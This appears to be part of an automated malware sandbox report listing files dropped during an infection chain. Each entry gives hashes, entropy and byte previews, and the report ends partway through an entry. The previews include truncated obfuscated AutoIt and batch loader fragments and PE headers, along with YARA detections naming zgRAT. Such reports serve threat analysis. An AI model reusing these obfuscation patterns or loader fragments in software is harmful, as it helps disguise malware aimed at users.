                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......`.........."......F...*.......Y.........@....................................v.....`...@...............@.............................Pl..|.......h....P..xo...2..`&......|...@...........................(...`................`..8............................text...dD.......F.................. ..`.rdata..DB...`...D...J..............@..@.data...P........P..................@....pdata..xo...P...p..................@..@.rsrc...h............N..............@..@.reloc..|............&..............@..B................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (822), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1279384
                                                                                                                                                                    Entropy (8bit):5.0644379393145424
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:4cVZ+Gk+GNp+gamDRv93ZLDOgelGglyKMNpF4AX5NUAvMNuZvHd1Q52s:4QybZ3O1X/CXLU
                                                                                                                                                                    MD5:60969E04B275EF5736BCFDBC9BB8956E
                                                                                                                                                                    SHA1:F83AEBF03595E292B4FA442268A04ADB9237D1B2
                                                                                                                                                                    SHA-256:FFE11903CB1D486498AE4D4BC4B877E042E9D5BB534BD83A885062CE9E7D3EA5
                                                                                                                                                                    SHA-512:0D1FD501E26924B98C30571A6778D571A81D758101AC9CDEBD7FE52650A6D31D504B3579B5BF9E9321B1F07C58D9737760C2EFC8AA2948670AC33D1CE61C6C47
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:$LogitechDeletedVersions = 61..$ScholarshipBs = 92..For $bMNte = 20 To 673..If $LogitechDeletedVersions = 59 Then..FileExists(MANORMATCH("93}115}39}81}106}107}39",42/7))..ACos(410)..$LogitechDeletedVersions = $LogitechDeletedVersions + 1..EndIf..If $LogitechDeletedVersions = 60 Then..Sqrt(7417)..FileExists(MANORMATCH("110}99}100}113}116}99}118}113}116}107}103}117}49}99}117}117}119}111}114}118}107}113}112}117}49",6/3))..$LogitechDeletedVersions = $LogitechDeletedVersions + 1..EndIf..If $LogitechDeletedVersions = 61 Then..Opt(MANORMATCH("86}116}99}123}75}101}113}112}74}107}102}103",4/2), 1)..ExitLoop..EndIf..If $LogitechDeletedVersions = 62 Then..Sqrt(2639)..Sqrt(8713)..$LogitechDeletedVersions = $LogitechDeletedVersions + 1..EndIf..Next..Func DiCarefully($machineryauditordog, $distinctionpartnereverywheregloves, $hungariansatelliteholytrials, $MercedesChannels, $EXEMPTOUTPUTS, $HomelessHosting, $DashAlways, $TravelersPar, $ErSimFist)..$PorscheWeekendsImpaired = '90946534876'..$originass
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1848), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13972
                                                                                                                                                                    Entropy (8bit):5.801943003416029
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:xPHVNWi9WRyY24I6VdM9XcKkpl7LXdb9W9X89S6/f9XcKntpFeae96fNaBNFeGew:MivY246XX2142hFXXXe6Fi85kN
                                                                                                                                                                    MD5:505F790E3CC3F421285B34B305CAE9AF
                                                                                                                                                                    SHA1:21670A4C7FED0276B21DCA2A3C99F6D3A0DF8BD0
                                                                                                                                                                    SHA-256:EEDF0F94E30907D8C55A5F6DC6312E52943D3268F1F4BC72270CE6DEBAE53D34
                                                                                                                                                                    SHA-512:1499095E2DCC66BE8593D6BF418BE378CA6BED7454FCA57FE4220B06F1F4A4B20CE9242AA9B75B237FEC4A9996A2F3E946D2D6B01B1557CABE2E19D0DCB5BF26
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:Set AaDTaJjYFxTHbULoQVcALegmXneImYdaCuCencdbebsfoosm=v..HjYTkbttVTGEmGr=tdsIKcFYnhLYsOiDspsr..IVtYzmbRnXLkItwiI=kHqcXMyMuLejfgZyvchJdW..uqdZNJKuvJEuv=hXaTGaLOkHvjCIFUY..fmTcHMarvFGCLoD=obUQJEvaOICBieABLfQWmSdF..DWyoJWgIPmiZiFKeBGYp=WzytQcsHjdigfyHslyLgSsDaCE..uTYksvJHDqrSAWwCoqKRmrL=BhUYEPMCjMkNgyPS..Set ntsujlaROxaRNpeoHJtBLeNgBGOKggrlSkwYxlfeCi=q..zKmCoFHcLsUcseEFvH=AsoZBotNvxwYEhaUQikCI..InAdFHsFJGVEgrlLXxtRlq=adoYoOnlyUUJKnlCbvRLxrZ..fKypQnRvHOoqvIpRlvPKxxAhMSGca=fgdpJnJgzGrbwVfl..PjqAYhfEUpRv=RcrsmTJhYLoVeoHWaEXCMRoaPdqwF..gRSxPHxKvcASQBSEWtIHCETTj=jKCoTIHpvdrHzZCIoCeTwHAlzVzXj..YYoPxJihCSlGtBBgLIyUvsR=YFlaPXgJWMaymDETA..ZlIxCZIylKSahGuPRPnPnFDAJao=OitjxBaHJDekJJNERE..LYKMOxKczGiKlQjdeFG=MgmyhNhyPSYJyUbntxfRJuYqBTRcb..KYkFMbnEmwiEGBHnE=aNkHdOgFdmDxVSIc..Set qnAiqqmVgKymvargBeJieIvduuZqyyfWl=x..ZtoaNLMwrpyTuAuxPYgysw=wTqmPpcofrKrp..JVcfGzuqhSAZLmXWh=YUimMjXSHqQPvvWw..eSQKIrqGoYQn=kaQxyfklpoaOLylbvreJzUrbFfRi..EguxLPbZwsHPVTKnWXXPpMVNOCd=zPPbtsEUkxZdMbx..cUbwzZIaTsJRzzFonoGkCpKD=PjC
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):154624
                                                                                                                                                                    Entropy (8bit):6.539601972943663
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:HDSN42zOCVZQCy9oilAVUWPrTjXrwHrSnePONqAMNtr80:HDSN1FQLaiOOWP/jXrwUqAM/X
                                                                                                                                                                    MD5:EFD8B81929D7C38B49E8DAAD7A20C138
                                                                                                                                                                    SHA1:EF55C3F3E31EB93389B639112ED97CF5FC41B1BF
                                                                                                                                                                    SHA-256:7BA2C0E7BF1E5ECE9A84DBAB13B90708A6B7CAB1CE4D410DBFC293CDCFBF8565
                                                                                                                                                                    SHA-512:5A4E3EC6F49C42548132EDC544CDC713759A42B9006F3FAE76D5DD9708319E33B8D758059F8ED82EFE62AD14381631863C3A31BC70E53B5ECB18C9804FC4402F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...D$0D..H..h...I..H.D$(I..H.\$ ..G..D......N...|$T;|$P...P..L;.......F...A...I...9D$@...O....p.......D..D$0M..H..h...I..H.D$(I..H.\$ .F..D...t..VN............O..L;........O..................O.......D..X.......p...M..I..I...........D$0H..h...H.D$(H.\$ .+F..D......M...|$P.t$X;|$T..2O..L;.......b...A..........I...#.....;.u.A............%...........I...9L$\...N..;....N....p.....D..X......D$0M..H..h...I..H.D$(I..H.\$ .E..D.....`....2M.....D$0H..h...H.D$(H.\$ .WE..D......M...|$P.t$X;|$T..^N..L;...........A...9D$\..CN..;...;N....p...I...D..X.......M..D$0I..H..h...I..H.D$(H.\$ ..D..D...t..L............M..L;........M..D......D9........M...Y.....X.......p...D..M..I..I...........D$0H..h...H.D$(H.\$ .dD..D......L...|$P;|$T..oM..L;...........A..........I...#.....;.u.A............%...........I...9L$\.. M....p.......D..D$0M..H..h...I..H.D$(I..H.\$ ..C..D.....l....{K.....D$0H..h...H.D$(H.\$ .C..D.....TK...|$P;|$T...L..L;...........A...I...9D$\...L....p.......D..D$0M..H..h...I..H.
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):175104
                                                                                                                                                                    Entropy (8bit):6.4026940422253364
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:McsuPwi9Cf7mKumDMr28XJQnugUB5XSXRsG5+N7+N:MchPwPf73umIrxJQugUvCXRB5+N7Q
                                                                                                                                                                    MD5:35AC7A5B2A591749C8A33F19DAB5CDBC
                                                                                                                                                                    SHA1:FC1EA0FE6E7E8481213E8A3434148211F71AB12A
                                                                                                                                                                    SHA-256:DE04D7BE8BD7B73EBFB135CBEE3AAFE84D3A544ACE7C5DBE994610D139608175
                                                                                                                                                                    SHA-512:49A8FCD2F7A0A44BBC6BB71EA9791F23E4570B81DC4F26B0994294943CB9CD0247442A3B657FAE6FEFB5F3B4B74A31A4F0DE43B818D6C776EA0757473A9C9A60
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:g..fD9?u$H...f....H..7g..fD9?u.H...f...q.....H.......H..Tf..L9..H.........fD9?..w...Hc.L...H.........?...H..H.M......3..E.P...H.M.D.BL.E...L.m.L.M.L.m.E3..E........E'....I..$......E3.........E...........D.E.E..A......E..y%fD9.......H...E.....E..H.}.......E'.`A..A....E..$@A..A.D....$.A...D....@".A...D....A....D......%.....D..A...t.E..u.....u.E.I..$L.M.E3.....I...E3..t"E..~ A....s7..I..$E3......E3..u.A..H.M.H.).u!........I.......E..t.....A..H.M.H.).u.........H...z...L..$......I.[0I.s@I.{HI..A_A^A]A\]....H.L$.H..(.L$0.H..kd..M..L.D$0.......t-HcD$0...|#;..w....H...H...I..H....@..........3.H..(...H.\$.H.l$.VWAVH..0E3.I..A..E.1I..H.D$`..H..fE90......H...(..H.........u.H..@.......H...(..H.........u.......LH...(..H.........u.......2H...(..H........u........H...(..H........u......3...:....(L.L$`.D$ ....E3...H....M...H.D$`H..t....H.\$PH.l$XH..0A^_^..H.\$.H.t$.WH.. H..(....H..u.H...X..H..(...H..8...H..0...L..H...%w..H......H..t*L......L..S.H......H..H......H..t.H.?.u.H..
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (3964), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):445440
                                                                                                                                                                    Entropy (8bit):4.042863496668086
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:z1gZjGg4zETGKMqt4t/Me/N4A3Zwk0bUNVOHR2:zelGglyKMNpF4AX5NU8
                                                                                                                                                                    MD5:8998A0723F051B5C7E91ABCFBF187143
                                                                                                                                                                    SHA1:6900FB44E2699F1897C1BFC87478EE8A44B7DA06
                                                                                                                                                                    SHA-256:BB4D3575AA1136FAC21D60E1F6F40190F631163F73E6554EF296D9E950B4D5EE
                                                                                                                                                                    SHA-512:3C8EA2C055BBBF4C5EB6F88F97989440FF5591797526F3779E7469ADC383063E0DC47DADBFE0FB43C361F3F043EB5FA7E4CAD7CF5D63C0093D9EDB7900553862
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:790E0BA5E53054E8D988F066842A7B82B76356DAA3EBA4F566489E8B4146392A7C630F29729D51C52EADB27035BCD770CE30CA2B8F13530D42CF956846C9E798F7F5BC30743247008E8EF7AA5F29F70806B878164BF499C432E57E45CF14274E0AC2EC356E9E09038BE262D60EA2B4530AD6CDCFCE0AAAEF272427A941F07506955CABE2D4CD34566F84D0E3370DA41A37D30866370BA8DE6597532910EF0A45CC54BAF72A3DC55F812DDEE0C78782CB1DDA0929E78A173ADA2CFCECFD7E3E51A8D440CD6560103B541F2DC46A969CC35C0AC92B612B7BD2E1FECAB5211F7FAE7B28D8CFE8AE1B6E993CA96B75C502392EF6C5608A804E80CD458B3E9F4FC0609E34BB6DD8A2F3B707D73E6475AED8252E28C3534589E05A586B7226578850361FFC2C51EADC13F288C1CEDFC50BA8C87049979D953E72B14B3897567ECFBA5ACCA76DFC6FF30A5790C01AC7A6026AEDE34817C9FFEF3D429C94AD0D190942CC00EA877B3E8C4A305C60A34319013C045A096E360422ABCD0F358E1105E72FC5E0B5136FBE54994C6566138BDDAE2825F5A3BEA5340098A95AA4A1D76FC6112E64B2414F3B16F3BF5CC733347592EC5ED84F716FB1EEC372AAF1C3F96E23D7D7C31394263AD39093541657A5161058821F4C0E5E9824902FAC81CF780A707683B7DE73EBBED69E695E129441E4E985AA63414946
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):158720
                                                                                                                                                                    Entropy (8bit):4.998880604264959
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:X61e9Bd0YddxrTgarmeI93RdeniKqk/IgM:X61eLgarRI93qi4M
                                                                                                                                                                    MD5:283B60351B19B137B0AD4EFB86DCBFC1
                                                                                                                                                                    SHA1:51D61A9ADD9DCB749F8DDD2F7FB9A4A9CF7C46BC
                                                                                                                                                                    SHA-256:A3217C4E170B80D7C75FF38D9667CCAA66349D8E0C3FC022F4EC0982909A754A
                                                                                                                                                                    SHA-512:5417AF78AA3CA8E76657FF3E89CD68D4B4925E6931620BEC7D58324C839DB140035F4CE11C73E74FC44DA8F0CC63D2C92D37C667C7FED879B193636A60494929
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././......./.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...............................................................................................................................................................................r.r.r.r.r.r.r.r.r.....................................r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................................................r...............................................................................................................................................r.....r.r...r.r.....r.r.........r.........................r...r...............r...............................................................................................
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):46176
                                                                                                                                                                    Entropy (8bit):6.921819874269237
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:bDP8WBosd0bHazf0Tye4Ur2+9ByVatPVEV3GPkj9d:sWyu0uZo2+9BgWOEMd
                                                                                                                                                                    MD5:0C257B9EDBCC7F41AF6E1027BC0713EE
                                                                                                                                                                    SHA1:2149A7BB22476F85610C842C34628B2F22D8A549
                                                                                                                                                                    SHA-256:7AC226E081D090F2E3CB99104B4226FCD5E77CB83F7EDB23081C1A2BD376533C
                                                                                                                                                                    SHA-512:F98B584E5112A81336AD4D7F2A1A4066028FC0C9D7A0B5B148172BD4C9A0485983EA868522A61999415837FDBD73401CB703138729E03831DC39BBE6C1F3F25B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.<...=.........1....v...*.:.....y<...#..g.>.0.m.\U.AD...kx.>(..U..c........G.[..MUMR-..........56T.K"..E.[...Nu.....MU.....GEd....C.6p..kU.........l....!.?.|.j.N.[.......YU}>.H\....1;;..........k...9....O...l.f.-K..|>c..?...B.C.K.y..X.yU./.a.E,..........W.=.i.:........|..a...\.D"%.....l.UD>.|.x.[... ^..?Q./l...!......0~....2.C.Y.(..Q.l..R.l,[)Wll...\......}.....R.i.>..4..i........m.<.U...|..H.{...(..-.m.P....Ts..4J....2..%V.K...YY/.]..Vbu.D.R5..eS.m..*..*...Ak. 5.7.!.3...70...i.3..... .. ........DB~".....E......m.~#.L.{............(..T.Y/V.._frq......u..6J...E.lQ,W(U....u[0...I._...>Z.&....h.T....0...B.-[U.....=..x<........k.D".$"?.........ln...e.....SX+Q.X....\H.Y=B.|&.....1....:"t&...`...Z..?...Q....C..B..m....d.{1e.X..V.p}:..,.s,-o`..}G......X8.pO....;..>Z.>|..4.ATU..e..eY.....@}].A....'h...e..V".Z..L.7..36[.X..%.A.I.g...)..b..-DB......Z..m..i..b.X.#.......a....~....+.e..k.]..d...e...T..)[.3.........&.HGI.B.C.f..5.K.gT..D"........b..|.0.O.O7..
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (822), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):454656
                                                                                                                                                                    Entropy (8bit):5.273728935999391
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:4bDf5iVZ+Gk+GNp+le5M2YmCDiDDFnv9aIZOAsGV7AX1A:4cVZ+Gk+GNp+gamDRv93ZLDO6
                                                                                                                                                                    MD5:4D83C8404F636CBB8AB0F08ED1063A14
                                                                                                                                                                    SHA1:1BF2758F989495E5A2F13ACD4C9FB2C8C176613F
                                                                                                                                                                    SHA-256:ECEEF58E2264D5624F0E961FC693DC07F5759B8C05E5C049DC56830EF2664000
                                                                                                                                                                    SHA-512:1D80FD78FD324CE95204557A097E0CEE348D76E4DE4C08CFD5B550AE4F0FEE1B3FEC42167BA9502574748E89518A74F1F4A20A59167334DA9F2FBD575444A9FC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:$LogitechDeletedVersions = 61..$ScholarshipBs = 92..For $bMNte = 20 To 673..If $LogitechDeletedVersions = 59 Then..FileExists(MANORMATCH("93}115}39}81}106}107}39",42/7))..ACos(410)..$LogitechDeletedVersions = $LogitechDeletedVersions + 1..EndIf..If $LogitechDeletedVersions = 60 Then..Sqrt(7417)..FileExists(MANORMATCH("110}99}100}113}116}99}118}113}116}107}103}117}49}99}117}117}119}111}114}118}107}113}112}117}49",6/3))..$LogitechDeletedVersions = $LogitechDeletedVersions + 1..EndIf..If $LogitechDeletedVersions = 61 Then..Opt(MANORMATCH("86}116}99}123}75}101}113}112}74}107}102}103",4/2), 1)..ExitLoop..EndIf..If $LogitechDeletedVersions = 62 Then..Sqrt(2639)..Sqrt(8713)..$LogitechDeletedVersions = $LogitechDeletedVersions + 1..EndIf..Next..Func DiCarefully($machineryauditordog, $distinctionpartnereverywheregloves, $hungariansatelliteholytrials, $MercedesChannels, $EXEMPTOUTPUTS, $HomelessHosting, $DashAlways, $TravelersPar, $ErSimFist)..$PorscheWeekendsImpaired = '90946534876'..$originass
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):188416
                                                                                                                                                                    Entropy (8bit):5.84355603429221
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:ksUMKCrMuoS7FIMQIPcNwTFVAu/BtqxDoY4B+VaAtJPJ:kHMKVu7FlNcwTFWusohudzh
                                                                                                                                                                    MD5:E08866278F3A97AEF93BA2A839C11F04
                                                                                                                                                                    SHA1:A014F0417591DA266A95F7590C9019B3CF6AE3BC
                                                                                                                                                                    SHA-256:21685A7876FE2CA8C890F0819A3D4E561A53A6F2C6A3212E134A87C2E1E4D39B
                                                                                                                                                                    SHA-512:679B15D6DB25A5CE4F9A11474136BE23876776E8B4FE4C9384CC51BEA15C6D715A15DF5AFC1283A08A19083AFD2A4A99CE6347D2ECE95EB1702354A57D3BC4CD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..u.H.U.I...................L.5J...I......H;.u[H..H..t.I..I+.A....E...fA;.u5I...H...u...u.H.EHH.@.H.X H...LM..H.S.I...l.................L.5....I...K...H;.uZH..H..t.I..I+.A....E...fA;.u4I...H...u...u-I.......H..@....[....F......>..............L.5....I....-..H;.u:H..H..t.I..I+.A....E...fA;.u.I...H...u...u....L.........L.5o...I...-..H;.uEH..H..t.I..I+.A....E...fA;.u.I...H...u...u.3.I....... ............L.5&...I...6-..H;.uGH..H..t.I..I+.A....E...fA;.u!I...H...u...u.H.U.I...4....+............L.5...I....,..H;.uOH..H..t.I..I+.A....E...fA;.u)I...H...u...u"I..E3.E3........U...H...b.........L.5....I...x,..H;.udH..H..t.I..I+.A....E...fA;.u>I...H...u...u7I..E3.I...............X.H...~....F.....................L.5P...I....,..H;.u[H..H..t.I..I+.A....E...fA;.u5I...H...u...u.H.UPI......H........EP...F......{............L.5....I...+..H;.udH..H..t.I..I+.A....E...fA;.u>I...H...u...u7H.EHH.@.H.X H...#J..L.K......I..A.....M................L.5....I....+..H;.unH..H..t.I..I+.A....E
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (3964), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):379288
                                                                                                                                                                    Entropy (8bit):5.398493617073305
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:cwjFrICYZNBkS6vHVD1kD6FlcSmLa/bJcfh1wVSpPD/a6DJHchn96M3an:Zj2CYZNuS6vHd1kD6Fhm5c/s
                                                                                                                                                                    MD5:BF8235618CB869E00161CB6318689E46
                                                                                                                                                                    SHA1:4B0E0EE156DFD1F1686D37772D24CE67393E58AC
                                                                                                                                                                    SHA-256:55F26CC8C2D64A7174B1FDE106EB1B65CEBBF7F32C6585C0737F6FAFEF6D4B3F
                                                                                                                                                                    SHA-512:6AF2346CCB99A11BF2031362BF442044275BC38EE441E946D21D22118B5D7D39406A31E5CFB7051C4F6C3C4AC87FC13B70116E697A74D8B25E2B5218A0832BEF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:2596B77D64FC3EFF3A117F3E439845D6374BA3E44ABDE8677E9ECF19FF0F9E24D68EF6D565CD52C464B5E46F113C6671571A9EA240D85B82B3942086B9588B617B61747F755CBF3F83694DB182068E2CB29A85B4236F6643A66428E8B133523FA47A411F9455B465C8C375AC823AC22487D9DE9DE9AD0D10C8E19A7D06A779D535402BBD7FC0E37F2EB6BC5C31FB13CC92F3B64B97AF79EEB67C25819D8CA8F4AEED6121BFB028E0ACD4D6F3E2852E67BCF580B0DD00DFC3708C6D57A927BCBD667E7705347B9206CBC2798A9D750A2E232949E89F9C239232E8050751904D914200A40840D2D9714A5B52E83479D91E4B0D9E8BA583EF527CB07610900836B137EE7C66CF5DCE14A147D9D0B743646264B6DB915639C1393387BD80080A8F1216309CD4392B481BF256346A3FB6D7BE0AA1F0C380FB109D01EBAFC13DD32CB9A8803F8503E6679B4C490EC1F217CC4CCB166C74A9CD03628862FA9750F959F1EB38891D247BC56D71213C55DB255D6B57960F535DE32F335028DF8DBB525049FBA0293CEF46B2C06712412909BA4BEEC443F72B9D7B14924BB95E0BA682764F37E319376BF754942EB50AE8C61BF36247389EAAA717101F871D8971050EB5C8BFA78907EBA19C00E96E82B6FFE34A41281EC95B655BD50AC443C50FCEC442611FA0E73E904F68DDCC8C4D09CB775D26B7D6C716
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):143360
                                                                                                                                                                    Entropy (8bit):6.57479998988545
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:iwPdxuSeoZpUtRbc3C7YTWY7aCAUMXrIJYZIJBwB4Ig:iwPuUGHc3AM7G/XruYZgwB4Ig
                                                                                                                                                                    MD5:F32CF54E9A67C7A652B0A63EBAC897FE
                                                                                                                                                                    SHA1:94662546B1E0B95E5FE190B268CD8370B534616B
                                                                                                                                                                    SHA-256:5B4766A612825C1640CD4BFE5E32A32EC0AA88DCC050FBE3CB821EF6F81563A7
                                                                                                                                                                    SHA-512:34AF7D1E95C95E6624EA3B2EE39C9371E4FA41DAEB76D4BA4E5F7F431033D0E93851AAB509856C798208F5568ACD23E58CF14AEFBB1F7891185A386A8779A8FE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:u..-...............4.......c.........................H.\$`H.. A_A^A\_^...H.\$.H.|$.L.t$.Lc.H.=....M..A.....I...A..?I...N...C..L.8G.\.9.........@..tL......t:...........t.A;.uD..C.L.8J...B.D.9..0..C.L.8J...B.D.9......C.L.8....C.L.8J...B.D.9...u........E..u...@....A........A.D.H.\$.H.|$.L.t$...H..(H..u......................A.H..(...H.\$.L.L$ WH.. I..I..H...s....H.......H..H...k...H..H.\$0H.. _..H.\$.H.t$.WH.. H..H..H.0H.......L..@..L.C.H.S.H.K.M..M..H..H...!...H..@..H.....H.t$8H..H.\$0H.. _.H.\$.H.l$.H.t$.WATAUAVAWH.. I..M..L..L..H..t.M..t.M..u/...............3.H.\$PH.l$XH.t$`H.. A_A^A]A\_.H..t.3.H...I..L;.w.A.A......t.E.a ..A.....I..I...H..H..............F...t7HcF...t/......H..H;.H..I..H.B.L...3..)^.H+.H..L......A..H;.rw.F...t.H...#.....uT.....H..E..t.3.H..H..H+.H;...H...B........D..I...~........;.t...;..G.H+.L..;.s;..N..H+.3.H..I.......A...H...#......t.I..H..~ .A.....D.Of H.......I.......H..L.H L.@.H.P.H.H.UH..H..`H..t.M..t.M..u..q..........F...3.H..`].H.E(L.M.H.E.L.E.H.
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):204800
                                                                                                                                                                    Entropy (8bit):6.40655123154893
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:vsVEU0SgcAApfFSvfWLhOa2rdf1wFX8ZpU80KS/n0zmPuBiGZNxzi+:mHggFOrrdNWsZK8X0n0SPuBiw3zB
                                                                                                                                                                    MD5:7DA539ACBD1604BB8C0AE5F6EB990BB8
                                                                                                                                                                    SHA1:1271FA42479299D5F337E03ABC82AF7125AA423F
                                                                                                                                                                    SHA-256:0D36E743B8A12A30F0AEC344FFDC0400E080AF2D1A8C322930A73147703A8902
                                                                                                                                                                    SHA-512:1BB62339D6A74128CFEFEC47FD0F360BED6DEA5CCF51D9D77CF84E3E8A920790141CCCDDBB6810A3F9B627AF7BBB0ED9A32F6EF2E92194085FEAF384B763AAD5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......`.........."......F...*.......Y.........@....................................v.....`...@...............@.............................Pl..|.......h....P..xo...2..`&......|...@...........................(...`................`..8............................text...dD.......F.................. ..`.rdata..DB...`...D...J..............@..@.data...P........P..................@....pdata..xo...P...p..................@..@.rsrc...h............N..............@..@.reloc..|............&..............@..B................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5284488
                                                                                                                                                                    Entropy (8bit):7.089727300904268
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:tR38zO5fluqDqt2Y9lvIQfCfZzW8/xAnknAT0QlfaFaftsuVFZLfYo2EerXz:tsw09h2fAnBvCAFdfYo2XXz
                                                                                                                                                                    MD5:2AA4B3C398F32A8D4403B21769ED1FC1
                                                                                                                                                                    SHA1:AB613095B2FB6717FA5C96D0A99F74D4E6203D03
                                                                                                                                                                    SHA-256:38610BB5D553F59193B5649A049E08A5409B6EF91957E0ABD454F85CCDC4CF7E
                                                                                                                                                                    SHA-512:788D567D99737D66A28EB06590CF76352A30AFE7A12805FA91F3ACB8F84B7EDFA7559EBE21941C3FE9E8294753D8C4B2A8BBE29A786DFD520A66C8E289613830
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\9D1E.exe, Author: Joe Security
                                                                                                                                                                    • Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\AppData\Local\Temp\9D1E.exe, Author: ditekSHen
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P...M..J......~.M.. ....N...@.. ........................P.......P...@.................................0.M.K.....N..F...........TP.pN...`P.......M.............................................. ............... ..H............text.....M.. ....M................. ..`.rsrc....F....N..H....M.............@..@.reloc.......`P.......P.............@..B................`.M.....H...........p............I).Z.$..........................................0..9.......(....8.....(.... .....:....&8....8........E........8....*.....(g...*&~.......*...~....*..0..@.......(g...8......(.... .....9....& ....8....8........E........8.....*&~.......*...~....*..0.......... ........8........E........U.......&...5...d...8....*s......... .....9....& ....8....(.... ....8....s......... .....:....& ....8....s.........8 ...s......... .....:j...& ....8_...s......... ....8K....
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1671680
                                                                                                                                                                    Entropy (8bit):5.897843523254229
                                                                                                                                                                    Encrypted:false
